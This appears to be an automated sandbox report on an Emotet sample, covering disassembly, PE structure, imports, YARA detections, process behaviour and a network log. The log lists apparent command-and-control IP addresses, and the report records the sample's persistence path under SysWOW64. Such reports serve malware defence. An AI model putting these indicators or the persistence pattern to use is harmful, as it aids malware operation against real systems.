                call dword ptr [0044E3ACh]
                push eax
                call 00007FBC6C9D9266h
                mov dword ptr [esi], eax
                pop ecx
                call 00007FBC6C9D8DBFh
                ret
                mov edi, edi
                push ebp
                mov ebp, esp
                push 00000000h
                push dword ptr [ebp+14h]
                push dword ptr [ebp+10h]
                push dword ptr [ebp+0Ch]
                push dword ptr [ebp+08h]
                call 00007FBC6C9E3008h
                add esp, 14h
                pop ebp
                ret
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                push ebx
                xor ebx, ebx
                push esi
                push edi
                cmp eax, ebx
                je 00007FBC6C9D8CE9h
                mov edi, dword ptr [ebp+00h]

                Rich Headers

                Programming Language:
                • [ C ] VS2008 build 21022
                • [LNK] VS2008 build 21022
                • [ C ] VS2005 build 50727
                • [ASM] VS2008 build 21022
                • [IMP] VS2005 build 50727
                • [RES] VS2008 build 21022
                • [EXP] VS2008 build 21022
                • [C++] VS2008 build 21022

                Data Directories

                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x61080 | 0x45 | .rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5eb04 | 0xdc | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x182e2 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x57c60 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x4e000 | 0x704 | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x5ea54 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                Sections

                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x4c25b | 0x4c400 | False | 0.565689036885 | data | 6.53895852223 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata | 0x4e000 | 0x130c5 | 0x13200 | False | 0.320606107026 | data | 5.00400278699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x62000 | 0x67b8 | 0x2c00 | False | 0.302379261364 | data | 4.20689124117 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc | 0x69000 | 0x182e2 | 0x18400 | False | 0.639839722938 | data | 6.84520055945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                Name | RVA | Size | Type | Language | Country
                RT_CURSOR | 0x6a6bc | 0x134 | data | English | United States
                RT_CURSOR | 0x6a7f0 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6a8a4 | 0x134 | data | English | United States
                RT_CURSOR | 0x6a9d8 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6aa8c | 0x134 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6abc0 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6ac74 | 0x134 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6ada8 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6ae5c | 0x134 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6af90 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6b044 | 0x200 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6b244 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6b2f8 | 0x200 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6b4f8 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6b5ac | 0x200 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6b7ac | 0xb4 | data | English | United States
                RT_CURSOR | 0x6b860 | 0x200 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6ba60 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6bb14 | 0x134 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6bc48 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6bcfc | 0x134 | data | English | United States
                RT_CURSOR | 0x6be30 | 0xb4 | data | English | United States
                RT_CURSOR | 0x6bee4 | 0x134 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6c018 | 0x134 | data | English | United States
                RT_CURSOR | 0x6c14c | 0x134 | data | English | United States
                RT_CURSOR | 0x6c280 | 0x134 | data | English | United States
                RT_CURSOR | 0x6c3b4 | 0x134 | data | English | United States
                RT_CURSOR | 0x6c4e8 | 0x134 | data | English | United States
                RT_CURSOR | 0x6c61c | 0x134 | data | English | United States
                RT_CURSOR | 0x6c750 | 0x134 | data | English | United States
                RT_CURSOR | 0x6c884 | 0x134 | data | English | United States
                RT_CURSOR | 0x6c9b8 | 0x134 | data | English | United States
                RT_CURSOR | 0x6caec | 0x134 | AmigaOS bitmap font | English | United States
                RT_CURSOR | 0x6cc20 | 0x134 | data | English | United States
                RT_CURSOR | 0x6cd54 | 0x134 | data | English | United States
                RT_CURSOR | 0x6ce88 | 0x134 | data | English | United States
                RT_CURSOR | 0x6cfbc | 0x134 | data | English | United States
                RT_CURSOR | 0x6d0f0 | 0xb4 | data | English | United States
                RT_BITMAP | 0x6d1a4 | 0x4a0 | data | English | United States
                RT_BITMAP | 0x6d644 | 0xb8 | data | English | United States
                RT_BITMAP | 0x6d6fc | 0x144 | data | English | United States
                RT_ICON | 0x6d840 | 0x2e8 | data | |
                RT_MENU | 0x6db28 | 0x12c | data | English | United States
                RT_MENU | 0x6dc54 | 0x3ac | data | English | United States
                RT_DIALOG | 0x6e000 | 0x184 | data | English | United States
                RT_DIALOG | 0x6e184 | 0x164 | data | English | United States
                RT_DIALOG | 0x6e2e8 | 0xf2 | data | English | United States
                RT_DIALOG | 0x6e3dc | 0xdc | data | English | United States
                RT_DIALOG | 0x6e4b8 | 0xe8 | data | English | United States
                RT_DIALOG | 0x6e5a0 | 0x1a2 | data | English | United States
                RT_DIALOG | 0x6e744 | 0x15a | data | English | United States
                RT_DIALOG | 0x6e8a0 | 0x34 | data | English | United States
                RT_STRING | 0x6e8d4 | 0x10e | data | English | United States
                RT_STRING | 0x6e9e4 | 0x204 | data | English | United States
                RT_STRING | 0x6ebe8 | 0x60 | data | English | United States
                RT_STRING | 0x6ec48 | 0x34 | data | English | United States
                RT_STRING | 0x6ec7c | 0x34 | data | English | United States
                RT_STRING | 0x6ecb0 | 0x358 | data | English | United States
                RT_STRING | 0x6f008 | 0x3a | data | English | United States
                RT_STRING | 0x6f044 | 0x208 | data | English | United States
                RT_STRING | 0x6f24c | 0xb0 | data | English | United States
                RT_STRING | 0x6f2fc | 0x298 | data | English | United States
                RT_STRING | 0x6f594 | 0x1ea | data | English | United States
                RT_STRING | 0x6f780 | 0xf0 | data | English | United States
                RT_STRING | 0x6f870 | 0xaa | data | English | United States
                RT_STRING | 0x6f91c | 0x46 | data | English | United States
                RT_STRING | 0x6f964 | 0x86 | data | English | United States
                RT_STRING | 0x6f9ec | 0x1f8 | data | English | United States
                RT_STRING | 0x6fbe4 | 0xae | data | English | United States
                RT_STRING | 0x6fc94 | 0xb2 | data | English | United States
                RT_STRING | 0x6fd48 | 0x2a | data | English | United States
                RT_STRING | 0x6fd74 | 0x184 | data | English | United States
                RT_STRING | 0x6fef8 | 0x124 | data | English | United States
                RT_STRING | 0x7001c | 0x4a | data | English | United States
                RT_STRING | 0x70068 | 0x4e6 | data | English | United States
                RT_STRING | 0x70550 | 0x264 | data | English | United States
                RT_STRING | 0x707b4 | 0x2da | data | English | United States
                RT_STRING | 0x70a90 | 0x8a | data | English | United States
                RT_STRING | 0x70b1c | 0x19a | data | English | United States
                RT_STRING | 0x70cb8 | 0xde | data | English | United States
                RT_STRING | 0x70d98 | 0x4a8 | data | English | United States
                RT_STRING | 0x71240 | 0x228 | data | English | United States
                RT_STRING | 0x71468 | 0x2c | data | English | United States
                RT_STRING | 0x71494 | 0x42 | data | English | United States
                RT_ACCELERATOR | 0x714d8 | 0x78 | data | English | United States
                RT_ACCELERATOR | 0x71550 | 0x18 | data | English | United States
                RT_RCDATA | 0x71568 | 0xf944 | data | |
                RT_GROUP_CURSOR | 0x80eac | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80ed0 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80ef4 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80f18 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80f3c | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80f60 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80f84 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80fa8 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80fcc | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x80ff0 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x81014 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x81038 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                RT_GROUP_CURSOR | 0x8105c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x81070 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x81084 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x81098 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x810ac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x810c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x810d4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x810e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x810fc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x81110 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x81124 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x81138 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x8114c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_CURSOR | 0x81160 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                RT_GROUP_ICON | 0x81174 | 0x14 | data | |
                RT_MANIFEST | 0x81188 | 0x15a | ASCII text, with CRLF line terminators | English | United States

                Imports

                DLL | Import
                KERNEL32.dll | GetACP, IsValidCodePage, LCMapStringW, VirtualFree, HeapCreate, GetStdHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, IsDebuggerPresent, GetConsoleCP, GetConsoleMode, LCMapStringA, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, SetEvent, TerminateProcess, HeapSize, CreateThread, ExitThread, ExitProcess, HeapReAlloc, VirtualAlloc, HeapFree, GetStartupInfoA, GetCommandLineA, HeapAlloc, RaiseException, RtlUnwind, GetTickCount, SetErrorMode, GetFileSizeEx, LocalFileTimeToFileTime, FileTimeToLocalFileTime, CreateFileA, GetShortPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, lstrcmpiA, GetStringTypeExA, DeleteFileA, MoveFileA, GetCurrentDirectoryA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, SystemTimeToFileTime, FileTimeToSystemTime, GetThreadLocale, GetOEMCP, GetCPInfo, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, GetModuleHandleW, GlobalFlags, InterlockedDecrement, GetModuleFileNameW, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, SuspendThread, ResumeThread, SetThreadPriority, CloseHandle, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetModuleFileNameA, GetLocaleInfoA, InterlockedExchange, lstrcmpA, GetCurrentThreadId, GlobalFindAtomA, GlobalDeleteAtom, FreeLibrary, CompareStringA, lstrcmpW, GetVersionExA, GetCurrentProcessId, GlobalGetAtomNameA, GlobalAddAtomA, GetProcAddress, GetModuleHandleA, LoadLibraryA, FreeResource, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, MultiByteToWideChar, MulDiv, lstrlenA, GetLastError, SetLastError, Sleep, GetExitCodeThread, CreateEventA, WideCharToMultiByte, FindResourceA, LoadResource, LockResource, SizeofResource, GetVersion, WaitForSingleObject, ResetEvent, GetTimeZoneInformation
                USER32.dll | RegisterClipboardFormatA, GetDCEx, EndPaint, BeginPaint, GetWindowDC, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, WindowFromPoint, GetSysColorBrush, GetMenuItemInfoA, InflateRect, DestroyCursor, SetRect, LoadCursorA, SetCapture, KillTimer, SetTimer, ClientToScreen, SetWindowRgn, DrawIcon, FillRect, CreateDialogIndirectParamA, GetNextDlgTabItem, EndDialog, ShowOwnedPopups, GetMessageA, TranslateMessage, GetCursorPos, ValidateRect, PostQuitMessage, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, ModifyMenuA, EnableMenuItem, CheckMenuItem, RegisterWindowMessageA, SendDlgItemMessageA, IsChild, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, GetPropA, RemovePropA, GetFocus, GetWindowTextA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, MessageBoxA, GetClassInfoExA, RegisterClassA, ScreenToClient, DeferWindowPos, GetScrollInfo, SetScrollInfo, DefWindowProcA, CallWindowProcA, SystemParametersInfoA, GetWindowPlacement, IsZoomed, GetClassNameA, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, WinHelpA, SetFocus, GetWindowThreadProcessId, IsWindowEnabled, EqualRect, GetDlgItem, GetDlgCtrlID, GetKeyState, LoadIconA, SetCursor, PeekMessageA, GetCapture, ReleaseCapture, LoadAcceleratorsA, SetActiveWindow, IsWindowVisible, IsIconic, InsertMenuItemA, CreatePopupMenu, GetClassInfoA, IntersectRect, OffsetRect, CopyRect, GetLastActivePopup, SetMenu, GetDesktopWindow, GetWindow, ShowWindow, GetSysColor, InvalidateRect, UnregisterClassA, GetTabbedTextExtentA, PostThreadMessageA, CreateMenu, CopyAcceleratorTableA, CharUpperA, DestroyIcon, GetWindowTextLengthA, LockWindowUpdate, GetWindowRect, SetRectEmpty, PtInRect, GetDC, GetSystemMetrics, ReleaseDC, GetMenuState, GetMenuStringA, AppendMenuA, InsertMenuA, RemoveMenu, AdjustWindowRectEx, RedrawWindow, SetWindowPos, GetClientRect, GetWindowLongA, SetWindowLongA, IsWindow, TranslateAcceleratorA, TranslateMDISysAccel, BringWindowToTop, GetActiveWindow, DrawMenuBar, CreateWindowExA, GetParent, GetMenuItemCount, GetSubMenu, GetMenuItemID, DefMDIChildProcA, GetMenu, DefFrameProcA, SendMessageA, LoadStringW, EnableWindow, UpdateWindow, PostMessageA, DispatchMessageA
                GDI32.dll | SelectClipRgn, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, GetPixel, PtVisible, RectVisible, SetPolyFillMode, TextOutA, Escape, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, CreatePatternBrush, CreateSolidBrush, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextAlign, GetTextFaceA, GetTextExtentPointA, GetWindowOrgEx, SetBkMode, RestoreDC, SaveDC, GetBkColor, ExtTextOutA, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, SetMapMode, SetStretchBltMode, GetDeviceCaps, BitBlt, CreateFontIndirectA, GetStockObject, PatBlt, Rectangle, GetViewportOrgEx, CreatePen, EndDoc, AbortDoc, SetAbortProc, EndPage, StartPage, StartDocA, Ellipse, LPtoDP, DPtoLP, CreateEllipticRgn, CreateBitmap, SetBkColor, SetTextColor, GetClipBox, GetTextExtentPoint32A, GetTextMetricsA, CreateCompatibleBitmap, CreateCompatibleDC, StretchDIBits, DeleteDC, GetObjectA, CreateFontA, SelectObject, GetCharWidthA, DeleteObject, CreateDCA, SetROP2
                COMDLG32.dll | GetFileTitleA
                WINSPOOL.DRV | ClosePrinter, OpenPrinterA, GetJobA, DocumentPropertiesA
                ADVAPI32.dll | RegSetValueExA, RegCreateKeyA, RegCreateKeyExA, GetFileSecurityA, SetFileSecurityA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegSetValueA, RegCloseKey, RegDeleteValueA
                SHELL32.dll | DragFinish, DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragAcceptFiles
                SHLWAPI.dll | PathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
                ole32.dll | OleDestroyMenuDescriptor, OleCreateMenuDescriptor, IsAccelerator, OleTranslateAccelerator, CoInitializeEx, CoUninitialize, CoCreateInstance, CoTaskMemFree
                OLEAUT32.dll | SysAllocStringLen, VariantChangeType, VariantClear, VariantInit

                Exports

                Name | Ordinal | Address
                Run | 1 | 0x4037c0

                Possible Origin

                Language of compilation system | Country where language is spoken
                English | United States

                Network Behavior

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Mar 26, 2021 13:32:21.149575949 CET | 49726 | 443 | 192.168.2.4 | 190.117.206.153
                Mar 26, 2021 13:32:24.137447119 CET | 49726 | 443 | 192.168.2.4 | 190.117.206.153
                Mar 26, 2021 13:32:30.138016939 CET | 49726 | 443 | 192.168.2.4 | 190.117.206.153
                Mar 26, 2021 13:32:46.299501896 CET | 49738 | 443 | 192.168.2.4 | 203.99.187.137
                Mar 26, 2021 13:32:46.539707899 CET | 443 | 49738 | 203.99.187.137 | 192.168.2.4
                Mar 26, 2021 13:32:47.045715094 CET | 49738 | 443 | 192.168.2.4 | 203.99.187.137
                Mar 26, 2021 13:32:47.283056974 CET | 443 | 49738 | 203.99.187.137 | 192.168.2.4
                Mar 26, 2021 13:32:47.795870066 CET | 49738 | 443 | 192.168.2.4 | 203.99.187.137
                Mar 26, 2021 13:32:48.117441893 CET | 443 | 49738 | 203.99.187.137 | 192.168.2.4
                Mar 26, 2021 13:32:52.279159069 CET | 49739 | 20 | 192.168.2.4 | 200.55.168.82
                Mar 26, 2021 13:32:55.280688047 CET | 49739 | 20 | 192.168.2.4 | 200.55.168.82
                Mar 26, 2021 13:33:01.296782970 CET | 49739 | 20 | 192.168.2.4 | 200.55.168.82
                Mar 26, 2021 13:33:18.696319103 CET | 49747 | 8080 | 192.168.2.4 | 70.32.94.58
                Mar 26, 2021 13:33:18.809274912 CET | 8080 | 49747 | 70.32.94.58 | 192.168.2.4
                Mar 26, 2021 13:33:19.314100027 CET | 49747 | 8080 | 192.168.2.4 | 70.32.94.58
                Mar 26, 2021 13:33:19.425592899 CET | 8080 | 49747 | 70.32.94.58 | 192.168.2.4
                Mar 26, 2021 13:33:19.939344883 CET | 49747 | 8080 | 192.168.2.4 | 70.32.94.58
                Mar 26, 2021 13:33:20.051001072 CET | 8080 | 49747 | 70.32.94.58 | 192.168.2.4
                Mar 26, 2021 13:33:23.146354914 CET | 49748 | 8080 | 192.168.2.4 | 213.138.100.98
                Mar 26, 2021 13:33:23.184562922 CET | 8080 | 49748 | 213.138.100.98 | 192.168.2.4
                Mar 26, 2021 13:33:23.689268112 CET | 49748 | 8080 | 192.168.2.4 | 213.138.100.98
                Mar 26, 2021 13:33:23.727399111 CET | 8080 | 49748 | 213.138.100.98 | 192.168.2.4
                Mar 26, 2021 13:33:24.236388922 CET | 49748 | 8080 | 192.168.2.4 | 213.138.100.98
                Mar 26, 2021 13:33:24.274235964 CET | 8080 | 49748 | 213.138.100.98 | 192.168.2.4
                Mar 26, 2021 13:33:28.601304054 CET | 49751 | 8080 | 192.168.2.4 | 144.76.62.10
                Mar 26, 2021 13:33:28.625920057 CET | 8080 | 49751 | 144.76.62.10 | 192.168.2.4
                Mar 26, 2021 13:33:29.127257109 CET | 49751 | 8080 | 192.168.2.4 | 144.76.62.10
                Mar 26, 2021 13:33:29.152199984 CET | 8080 | 49751 | 144.76.62.10 | 192.168.2.4
                Mar 26, 2021 13:33:29.658544064 CET | 49751 | 8080 | 192.168.2.4 | 144.76.62.10
                Mar 26, 2021 13:33:29.680944920 CET | 8080 | 49751 | 144.76.62.10 | 192.168.2.4
                Mar 26, 2021 13:33:33.485486031 CET | 49752 | 990 | 192.168.2.4 | 203.99.188.203
                Mar 26, 2021 13:33:33.705632925 CET | 990 | 49752 | 203.99.188.203 | 192.168.2.4
                Mar 26, 2021 13:33:34.221575022 CET | 49752 | 990 | 192.168.2.4 | 203.99.188.203
                Mar 26, 2021 13:33:34.439589024 CET | 990 | 49752 | 203.99.188.203 | 192.168.2.4
                Mar 26, 2021 13:33:34.940423965 CET | 49752 | 990 | 192.168.2.4 | 203.99.188.203
                Mar 26, 2021 13:33:35.159921885 CET | 990 | 49752 | 203.99.188.203 | 192.168.2.4
                Mar 26, 2021 13:33:38.379935980 CET | 49753 | 990 | 192.168.2.4 | 201.196.15.79
                Mar 26, 2021 13:33:41.378377914 CET | 49753 | 990 | 192.168.2.4 | 201.196.15.79
                Mar 26, 2021 13:33:47.378798962 CET | 49753 | 990 | 192.168.2.4 | 201.196.15.79

                Code Manipulations

                System Behavior

                General

                Start time:13:31:52
                Start date:26/03/2021
                Path:C:\Users\user\Desktop\YF4dF4w2Cr.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\YF4dF4w2Cr.exe'
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                General

                Start time:13:31:52
                Start date:26/03/2021
                Path:C:\Users\user\Desktop\YF4dF4w2Cr.exe
                Wow64 process (32bit):true
                Commandline:--5c8d8ab7
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                General

                Start time:13:31:57
                Start date:26/03/2021
                Path:C:\Windows\SysWOW64\fwdrrebrand.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\fwdrrebrand.exe
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                General

                Start time:13:31:58
                Start date:26/03/2021
                Path:C:\Windows\SysWOW64\fwdrrebrand.exe
                Wow64 process (32bit):true
                Commandline:--1cbc15eb
                Imagebase:0x400000
                File size:502272 bytes
                MD5 hash:F4D1470AF3A7D82560B38558B132D468
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, Author: kevoreilly
                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: Emotet, Description: Emotet Payload, Source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, Author: kevoreilly
                Reputation:low

                Disassembly

                Code Analysis

                  Execution Graph

                  Execution Coverage:6.3%
                  Dynamic/Decrypted Code Coverage:3.3%
                  Signature Coverage:7.3%
                  Total number of Nodes:1569
                  Total number of Limit Nodes:35

                  Graph

API calls 42888->42889 42889->42886 42891 424509 42890->42891 42892 42450e 42890->42892 42905 406436 2 API calls 4 library calls 42891->42905 42892->42877 42892->42878 42895 42fbaf 42894->42895 42897 42483b 42894->42897 42906 423a41 42895->42906 42897->42882 42898 4063fe RaiseException __CxxThrowException@8 42897->42898 42900 4246e2 ~_Task_impl 42899->42900 42901 4246f7 42900->42901 42904 4246fe 42900->42904 42914 42441c 69 API calls 3 library calls 42900->42914 42915 424677 42901->42915 42904->42877 42905->42892 42907 423a6e 42906->42907 42908 423a4d 42906->42908 42909 406436 ~_Task_impl LocalAlloc RaiseException 42907->42909 42908->42907 42910 423a53 42908->42910 42912 423a73 42909->42912 42911 404461 std::ios_base::_Init 69 API calls 42910->42911 42913 423a60 42911->42913 42913->42897 42914->42901 42916 424690 42915->42916 42917 424682 42915->42917 42916->42904 42918 423a41 ~_Task_impl 71 API calls 42917->42918 42918->42916 43046 40a58e 42919->43046 42922 401192 42922->42846 42924 401251 42924->42846 42930 401248 42930->42846 42932 401218 42932->42930 43093 413276 42932->43093 42934 401228 43099 412f2d 42934->43099 42936 401234 43107 412fbe 42936->43107 42942 41f4e8 112 API calls 42941->42942 42943 4115c9 42942->42943 43381 4134c3 